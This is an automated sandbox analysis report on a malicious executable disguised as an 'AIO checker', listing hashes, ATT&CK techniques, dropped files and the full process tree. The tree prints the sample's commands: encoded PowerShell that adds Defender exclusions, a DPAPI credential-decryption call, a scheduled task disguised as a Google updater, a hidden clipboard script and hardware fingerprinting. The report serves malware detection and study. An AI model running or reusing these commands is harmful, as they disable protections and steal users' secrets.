1834d77a2ea872a9ab2e2d5859dac84585775ecf2288a559943c648730d0b45b

Analysis

max time kernel
2s
max time network
12s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
09/07/2024, 13:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Supreme-Luxify-4-The-Best-AIO-Checker_fixed.exe
Size

37.7MB
MD5

521b4717d6cc5bd6fcb9443ec6c5ff9c
SHA1

a9b61e5a0951552fca41474653d9b7009d7b199e
SHA256

9fa7bb202f5244c6e6801e68ee2e45ca479e740cbc6c60ddc930540bc852a635
SHA512

f63bee4854bc2ae3ea452c8adf54077cb7e94abb93bece577850b4d7c96e36221d164f9d638c60fd992517ca2e901c475919b457594585cc2cef86dce9e5d246
SSDEEP

786432:W6OpXUxzDxqVfuA0PbwgY+KgM0A1iuHalth12vzOOh9hP7:YpXUxz92fuA0jwgY9T0IiuHajhovfR7

Score

8^/10

defense_evasion execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1800	powershell.exe
2004	powershell.exe
660	powershell.exe
3632	powershell.exe
3308	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4752	app.exe

Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
4948	cmd.exe

An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs

pid	Process
1320	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
2084	tasklist.exe
4208	tasklist.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4904	schtasks.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
660	powershell.exe
3632	powershell.exe
660	powershell.exe
3632	powershell.exe
660	powershell.exe
3632	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	660	powershell.exe
Token: SeDebugPrivilege	3632	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3604 wrote to memory of 660	3604	Supreme-Luxify-4-The-Best-AIO-Checker_fixed.exe	73
PID 3604 wrote to memory of 660	3604	Supreme-Luxify-4-The-Best-AIO-Checker_fixed.exe	73
PID 3604 wrote to memory of 660	3604	Supreme-Luxify-4-The-Best-AIO-Checker_fixed.exe	73
PID 3604 wrote to memory of 3632	3604	Supreme-Luxify-4-The-Best-AIO-Checker_fixed.exe	74
PID 3604 wrote to memory of 3632	3604	Supreme-Luxify-4-The-Best-AIO-Checker_fixed.exe	74
PID 3604 wrote to memory of 3632	3604	Supreme-Luxify-4-The-Best-AIO-Checker_fixed.exe	74
PID 3604 wrote to memory of 4752	3604	Supreme-Luxify-4-The-Best-AIO-Checker_fixed.exe	77
PID 3604 wrote to memory of 4752	3604	Supreme-Luxify-4-The-Best-AIO-Checker_fixed.exe	77

C:\Users\Admin\AppData\Local\Temp\Supreme-Luxify-4-The-Best-AIO-Checker_fixed.exe
"C:\Users\Admin\AppData\Local\Temp\Supreme-Luxify-4-The-Best-AIO-Checker_fixed.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3604
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAZQB2ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHAAeABrACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBOAEUAVAAgAEYAcgBhAG0AZQB3AG8AcgBrACAANAAuADgAIABuAG8AdAAgAGYAbwB1AG4AZAAgAGUAcgByAG8AcgAgADAAeAA4ADAAMABGADAAOQA1ADAAJwAsACcAJwAsACcATwBLACcALAAnAFcAYQByAG4AaQBuAGcAJwApADwAIwBkAG0AdgAjAD4A"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:660
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAdQB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAeABiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AeQB3ACMAPgA="
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3632
- C:\Users\Admin\AppData\Roaming\app.exe
  "C:\Users\Admin\AppData\Roaming\app.exe"
  2⤵
  - Executes dropped EXE
  PID:4752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
    3⤵
    PID:1860
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
      4⤵
      PID:3884
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -noprofile -
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3308
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\eyn4gzzd\eyn4gzzd.cmdline"
        5⤵
        
        PID:4112
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES75EB.tmp" "c:\Users\Admin\AppData\Local\Temp\eyn4gzzd\CSCBF010EA8FA3E4639AAAAC9FF50C494A1.TMP"
        6⤵
        
        PID:872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
    3⤵
    PID:4200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2540
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:2084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4920
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:4208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,57,127,181,52,40,252,34,72,131,44,63,89,128,239,70,113,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,11,255,216,153,250,77,82,111,126,95,98,94,219,115,174,189,160,139,237,110,251,196,56,179,203,228,197,181,15,120,67,20,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,30,133,100,191,15,223,21,248,203,88,227,180,113,230,106,207,51,98,112,135,217,240,250,205,108,213,119,246,2,158,201,93,48,0,0,0,178,101,198,205,60,104,197,46,221,160,198,102,133,127,127,90,15,146,64,171,161,165,85,208,32,230,17,132,195,114,136,96,252,86,8,99,164,60,179,237,198,141,203,205,95,178,246,118,64,0,0,0,48,174,109,113,48,104,148,66,11,129,145,197,20,137,225,112,70,116,236,62,53,35,210,159,99,40,19,59,102,209,13,191,44,242,249,158,237,154,21,93,58,208,230,170,117,133,63,219,175,75,182,195,205,244,44,132,173,14,239,143,205,34,169,63), $null, 'CurrentUser')"
    3⤵
    - An obfuscated cmd.exe command-line is typically used to evade detection.
    PID:1320
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,57,127,181,52,40,252,34,72,131,44,63,89,128,239,70,113,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,11,255,216,153,250,77,82,111,126,95,98,94,219,115,174,189,160,139,237,110,251,196,56,179,203,228,197,181,15,120,67,20,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,30,133,100,191,15,223,21,248,203,88,227,180,113,230,106,207,51,98,112,135,217,240,250,205,108,213,119,246,2,158,201,93,48,0,0,0,178,101,198,205,60,104,197,46,221,160,198,102,133,127,127,90,15,146,64,171,161,165,85,208,32,230,17,132,195,114,136,96,252,86,8,99,164,60,179,237,198,141,203,205,95,178,246,118,64,0,0,0,48,174,109,113,48,104,148,66,11,129,145,197,20,137,225,112,70,116,236,62,53,35,210,159,99,40,19,59,102,209,13,191,44,242,249,158,237,154,21,93,58,208,230,170,117,133,63,219,175,75,182,195,205,244,44,132,173,14,239,143,205,34,169,63), $null, 'CurrentUser')
      4⤵
      PID:2524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
    3⤵
    PID:3668
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic diskdrive get serialnumber
      4⤵
      PID:3564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
    3⤵
    PID:2304
  - - C:\Windows\system32\reg.exe
      reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
      4⤵
      PID:3440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
    3⤵
    PID:4056
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
    3⤵
    - Hide Artifacts: Hidden Window
    PID:4948
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1800
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gnes0zxv\gnes0zxv.cmdline"
        5⤵
        
        PID:1860
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F42.tmp" "c:\Users\Admin\AppData\Local\Temp\gnes0zxv\CSC424A031CA0BE447E94F0C8DAB1D2288.TMP"
        6⤵
        
        PID:4980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
    3⤵
    PID:3908
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic bios get smbiosbiosversion
      4⤵
      PID:1864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
    3⤵
    PID:2964
  - - C:\Windows\system32\cscript.exe
      cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
      4⤵
      PID:1228
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
        5⤵
        
        PID:1904
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
    3⤵
    PID:3928
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic baseboard get serialnumber
      4⤵
      PID:3500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
    3⤵
    PID:4868
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic MemoryChip get /format:list
      4⤵
      PID:4872
  - - C:\Windows\system32\find.exe
      find /i "Speed"
      4⤵
      PID:4432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
    3⤵
    PID:3332
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_computersystemproduct get uuid
      4⤵
      PID:4376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell wininit.exe"
    3⤵
    PID:5000
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell wininit.exe
      4⤵
      PID:2300
    - - C:\Windows\system32\wininit.exe
        
        "C:\Windows\system32\wininit.exe"
        5⤵
        
        PID:744

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Credential Access

Discovery

Process Discovery

T1057

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

Filesize
1KB

MD5
0af12b0adb9f07e2e99a2f562067e399

SHA1
cf271af076715e2347d56fae3e5f1ba6c42aa122

SHA256
e4c1dbb5de63eec69a1f02e25c5dd687a5872f0cf112d8d184eb4f566d9983a0

SHA512
f814382e9aa3b7d12389a4da6cc2274045646bb75fbb619e3a1fd953824978790a3491b19d9aff89a1b56049b3a290bdc5de93c459e1b83eaa342d46fdcfc412

Download Submit
C:\ProgramData\edge\Updater\Get-Clipboard.ps1

Filesize
3KB

MD5
67ee5d0262765af723c12b409bde8969

SHA1
81f003e436cca022a88675cb24dba0b5ed0311cd

SHA256
aefb39dbdf2f0173c44a80e0456dd50dd5849dafbc94f996d2796e4bf7fdf5b3

SHA512
f66dc507006f9f2271fae233357db4f8ae9c7729156538220940f13edd96fabe1cb878e76f92bd0e576286b823bfa041e25e809373e503219249cd871be854a1

Download Submit
C:\ProgramData\edge\Updater\RunBatHidden.vbs

Filesize
146B

MD5
14a9867ec0265ebf974e440fcd67d837

SHA1
ae0e43c2daf4c913f5db17f4d9197f34ab52e254

SHA256
cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1

SHA512
36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
32e05f2444df5b7af684f8105b7b87f8

SHA1
381941d3d35458b454eaa7fbc7694c827194c5a8

SHA256
d41e68a5a3165192ac482de7b0d76e07d77eb04c81243b0b889e6abfb97d187d

SHA512
fc0c994c5be244b347b80aef2d54f918159ef85a6b9574408f0237ac26c99e3cb2142627d4386740b92e4eff1693e6d04a9c43d0ba1e11104453b35285d85caf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
e3bff42326f495642ea2b069135abd40

SHA1
49643be4518aba5eedc473ab177d52b01918eda8

SHA256
45e20a0fc0eca019cd2936879d674e27b044863ab3073d5288e496b0d01b5a2e

SHA512
dd12d8e39a9ce3bf91afe0dd0a30181c4e7cb63a6feaf3d09ddf97395d19e5c0232cb018d1dcd46a8ae1999695107e98e29672cf5178e6edbe11c0603afc569b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
57a467ed62e54376da1bf7fecbee5d0a

SHA1
3a2ff184ade7f0729e7b3acad4cc6c0c3e72e704

SHA256
fee4fb539ddb783450301765c253b0fb5affda7722059577f337311bbff66a03

SHA512
acb05fa74a025b6d447bb3b9734ac5a13de22cf905abc835dd8c20e8f7775e295d9ac7c307822cbd288618594f6e77198645b173f5a2a483b9383683f7ccca8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\338c5fd08c79aea99a62b36bcc8bccdaFSTst6\OutBackup.xlsx

Filesize
899KB

MD5
b2185826723a4ff58e1634243fffc7f4

SHA1
a89dbde20729eab28c897dcf0b0f5e8ffcd6f2fd

SHA256
ab5993a3b4eb140549e1cb5e3b5dbaa908b175451129e40cafc8d48302759490

SHA512
7ae9969f32c8482d810502ef81a33580864370b08f5ed71f1c4e047849fd4c3dd4e7031000c0685bbd65df9afcf3b3ce2070bf0ba36a9a7ecd5c0dbc74fa7551

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES75EB.tmp

Filesize
1KB

MD5
616bddbbfd66a689ef23f8e077a13b1e

SHA1
9f7ed5cf23ac2b4317bfdd0569e5c86abfa1ae4d

SHA256
5a02c417ccfdd40cc7aa9d10bf311462599eb7bf974d0acf53e9fcc683b745c7

SHA512
4233b988434e40d25ca503c42afcaea3505e54b4770adf977d119e40bccda4e49e7868c9959620591d7afb4a18a635e4d93204715da3884f2140f80deef46175

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7F42.tmp

Filesize
1KB

MD5
944864fc340ca2f9089340cf5ea4b1a5

SHA1
247fc220590e79a880bd1ce270521b8c05dbcf16

SHA256
d4cf9d186a71a68d848d054b2801c20e8cab6be2abd3c797d5c1dd97bc0743f1

SHA512
2fb43b14780829460fdb0137b357c4b2b59f6bc0db5043cd43f876f1aa905b6fbc3007c27addc4064452d9494befbbeeb9b3b707739e660ceb26af32c883df07

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wj0pe02m.f52.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\eyn4gzzd\eyn4gzzd.dll

Filesize
3KB

MD5
095915d6222d4e736e2b2f6ebcfde34b

SHA1
7a2a690b17f1082916ac206ac2881bb23ff09790

SHA256
41c7f72f4c6307fa86b398c2f64a90ef140459e0688b6576541ab2108b836365

SHA512
6c9abfab9db5b0077ff12f0826dbe8f813a452bb3888fd385f7fe5c063a02abafe01184f3d720bb37d0e3aa21a73f50c5a0075ea01da11936f3ef44763dcf797

Download Submit
C:\Users\Admin\AppData\Local\Temp\gnes0zxv\gnes0zxv.dll

Filesize
3KB

MD5
80ce41fd927bc457653a6c26cf7e6f68

SHA1
3c818de2667ffbd3cc29eaf52c4f2d16f6f3b2b7

SHA256
9b54189755c6c4a87c83ab77e8f48dcf7707eb8868894bc6516a8349eddb7de9

SHA512
60d71dbae208b1e7b5b636ed9eb3bc536a521e46a4509511a6c0af7b1cfc47026545e7eb790683fe63c885531a360c0e41369dfefb4968f6c7603ebc480aa24c

Download Submit
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

Filesize
1.8MB

MD5
66a65322c9d362a23cf3d3f7735d5430

SHA1
ed59f3e4b0b16b759b866ef7293d26a1512b952e

SHA256
f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

SHA512
0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp.ps1

Filesize
379B

MD5
18047e197c6820559730d01035b2955a

SHA1
277179be54bba04c0863aebd496f53b129d47464

SHA256
348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3

SHA512
1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

Download Submit
C:\Users\Admin\AppData\Roaming\app.exe

Filesize
37.6MB

MD5
832592e6c80bde348661845d56306dfa

SHA1
785fcd2c1cb296c287020c93125296f826370490

SHA256
5d76f475b797f112e458582eed33e94d2031cfdf3ddc6c0c94852d710749d2ac

SHA512
67b986fe15b496639c59a6db87795eb3297633776e6164b13c4333f6a38b3d20c86d69209b669bbdbfce74b43f345aac84ce2dadd33c1373987347fc0b66681d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\eyn4gzzd\CSCBF010EA8FA3E4639AAAAC9FF50C494A1.TMP

Filesize
652B

MD5
584938506574f3b476bef25bc5f8b7ec

SHA1
d99a6192b7e1ee83b57865367d17e404874a081c

SHA256
d64d673df354b927874c23d99415bee2a69c84f65c9da7733973860a235878f3

SHA512
1c7e092fa5dee5340ed634ec94858ec086e68a86ad0a85ca515a037c45ebf3100cdb9f0f353b81b942b2d7a18679ff92966c79100e6e35c71cee7d06142b9e71

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\eyn4gzzd\eyn4gzzd.0.cs

Filesize
311B

MD5
7bc8de6ac8041186ed68c07205656943

SHA1
673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75

SHA256
36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697

SHA512
0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\eyn4gzzd\eyn4gzzd.cmdline

Filesize
369B

MD5
b9289649401eeefb67bb0286a5a56389

SHA1
e9dbb7496cf92f2b32dc6f99c5735e65d8612ea9

SHA256
645c9e67dc68673c190319433d9edb6c2d717c35edfc5c49fcbdca41b36ce953

SHA512
990b0bacfecb5dfd67cb8a0c2e9b3ffe1b595716fe5a91fc25994ce3bf1c0e8880238a3360c30a6be002dd4df17fab2a90dd77ef3b7f5c7f76289b8c1d8fc719

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gnes0zxv\CSC424A031CA0BE447E94F0C8DAB1D2288.TMP

Filesize
652B

MD5
d9b4931a5a3a9ab4419bc54da74842fe

SHA1
59dfa95341829ba3b2a8d2f2a7c4930559750efb

SHA256
0c26b74d8384f6c6de60765c385419e75ed166933473d05dd1ecc517e101f53d

SHA512
28acb7558b049b442c55a003c242b03c2ee152e54fd53b4f76bce4aa9abecf246135f8e33d2f3eaef0962fef422a193e8a860226f4238c7838abdaa635ffd412

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gnes0zxv\gnes0zxv.0.cs

Filesize
426B

MD5
b462a7b0998b386a2047c941506f7c1b

SHA1
61e8aa007164305a51fa2f1cebaf3f8e60a6a59f

SHA256
a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35

SHA512
eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gnes0zxv\gnes0zxv.cmdline

Filesize
369B

MD5
86cc9aff1026cc5f7449bc0eca8b1685

SHA1
276d17db2fcab64d9a5d2fa6efb11cfda2000f48

SHA256
8419af01dae79ced844217cb573f5c4c01bea9277adc8add433e8a700570aba5

SHA512
6a311b9437538a1179c9bcc8c6397357def1ddd0428de3599d5eae8efe528a5ffe9fdcd3865d0c5017a8111b343ba156ca5a1cec0052fc1fd113094e7374338d

Download Submit
memory/660-16-0x00000000076E0000-0x00000000076FC000-memory.dmp

Filesize
112KB

Download
memory/660-169-0x0000000009180000-0x0000000009212000-memory.dmp

Filesize
584KB

Download
memory/660-4-0x0000000006720000-0x0000000006756000-memory.dmp

Filesize
216KB

Download
memory/660-157-0x0000000009DD0000-0x000000000A2CE000-memory.dmp

Filesize
5.0MB

Download
memory/660-124-0x0000000008CD0000-0x0000000008CEA000-memory.dmp

Filesize
104KB

Download
memory/660-121-0x0000000009750000-0x0000000009DC8000-memory.dmp

Filesize
6.5MB

Download
memory/660-22-0x0000000007E90000-0x0000000007F06000-memory.dmp

Filesize
472KB

Download
memory/660-17-0x00000000080B0000-0x00000000080FB000-memory.dmp

Filesize
300KB

Download
memory/660-5-0x0000000006D90000-0x00000000073B8000-memory.dmp

Filesize
6.2MB

Download
memory/1800-627-0x00000168E7A10000-0x00000168E7A18000-memory.dmp

Filesize
32KB

Download
memory/2524-530-0x0000025051D50000-0x0000025051DA0000-memory.dmp

Filesize
320KB

Download
memory/3308-172-0x0000021FF8920000-0x0000021FF895C000-memory.dmp

Filesize
240KB

Download
memory/3308-126-0x0000021FF8630000-0x0000021FF8652000-memory.dmp

Filesize
136KB

Download
memory/3308-458-0x0000021FF8690000-0x0000021FF8698000-memory.dmp

Filesize
32KB

Download
memory/3308-185-0x0000021FF8E30000-0x0000021FF8EA6000-memory.dmp

Filesize
472KB

Download
memory/3632-134-0x0000000009770000-0x0000000009815000-memory.dmp

Filesize
660KB

Download
memory/3632-160-0x0000000009A30000-0x0000000009AC4000-memory.dmp

Filesize
592KB

Download
memory/3632-435-0x00000000099D0000-0x00000000099EA000-memory.dmp

Filesize
104KB

Download
memory/3632-129-0x00000000094E0000-0x00000000094FE000-memory.dmp

Filesize
120KB

Download
memory/3632-127-0x0000000009720000-0x0000000009753000-memory.dmp

Filesize
204KB

Download
memory/3632-128-0x00000000737D0000-0x000000007381B000-memory.dmp

Filesize
300KB

Download
memory/3632-442-0x00000000099C0000-0x00000000099C8000-memory.dmp

Filesize
32KB

Download
memory/3632-13-0x0000000007F60000-0x00000000082B0000-memory.dmp

Filesize
3.3MB

Download
memory/3632-9-0x0000000007420000-0x0000000007486000-memory.dmp

Filesize
408KB

Download
memory/3632-11-0x0000000007DF0000-0x0000000007E56000-memory.dmp

Filesize
408KB

Download
memory/3632-8-0x0000000007380000-0x00000000073A2000-memory.dmp

Filesize
136KB

Download